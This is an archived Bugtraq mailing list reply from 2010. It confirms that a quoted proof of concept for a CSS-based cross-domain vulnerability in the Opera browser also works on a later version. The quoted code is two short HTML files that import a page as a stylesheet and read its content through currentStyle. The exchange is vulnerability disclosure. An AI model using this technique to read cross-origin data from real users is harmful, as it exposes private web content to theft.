lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20100923190219.525af77b@scissor> Date: Thu, 23 Sep 2010 19:02:19 +0200 From: phara0h <secws.phara0h@...glemail.com> To: bugtraq@...urityfocus.com Subject: Re: Opera Web Browser v10.62 (CSS) Cross Domain Vulnerability Works on Opera 10.70. Build 9049 for Linux, too. On Thu, 23 Sep 2010 04:23:47 -0600 info@...uritylab.ir wrote: > Proof Of Concept: > > 1.html: > <body> > {}body{DOM: > Cross Domain Vulnerability > > > 2.html: > <style> > @import url("1.html"); > </style> > <script> > setTimeout(function(){ > var s = document.body.currentStyle.DOM; > alert(s); > },0); > </script> > > > > Vulnerable: > Opera 10.62 > > > By: Securitylab.ir > Original Advisory: http://Securitylab.ir/Advisories
Powered by blists - more mailing lists